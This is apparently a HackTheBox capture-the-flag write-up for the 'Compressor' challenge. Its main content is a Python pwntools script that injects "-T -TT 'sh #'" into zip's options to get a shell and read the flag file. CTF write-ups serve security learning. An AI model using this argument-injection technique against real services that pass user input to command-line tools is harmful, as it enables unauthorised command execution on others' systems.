HackTheBox Compressor Challenge

2024-12-17[Updated: 2024-12-17]

https://app.hackthebox.com/challenges/358

Description

Ramona's obsession with modifications and the addition of artifacts to her body has slowed her down and made her fail and almost get killed in many missions. For this reason, she decided to hack a tiny robot under Golden Fang's ownership called "Compressor", which can reduce and increase the volume of any object to minimize/maximize it according to the needs of the mission. With this item, she will be able to carry any spare part she needs without adding extra weight to her back, making her fast. Can you help her take it and hack it?

Exploitation

#!/usr/bin/python3
from pwn import *
import time

def exploit(ip, port):
    p = remote(ip, int(port))
    p.sendlineafter(b'[*] Choose component: ', b'1')
    p.sendlineafter(b'[*] Choose action: ', b'1')
    p.sendlineafter(b'Insert name: ', b'htb')
    p.sendlineafter(b'Insert content: ', b'htb')
    p.sendlineafter(b'[*] Choose action: ', b'3')
    p.sendlineafter(b'Insert <name>.zip: ', b'htb')
    p.sendlineafter(b'Insert <name>: ', b'htb')
    p.sendlineafter(b'Insert <options>: ', b'-T -TT \'sh #\'')
    p.sendline(b"cat ~/flag.txt")
    p.interactive()

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    ip, port = sys.argv[1].split(':')
    exploit(ip, port)

reference

Summary

Compressor: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.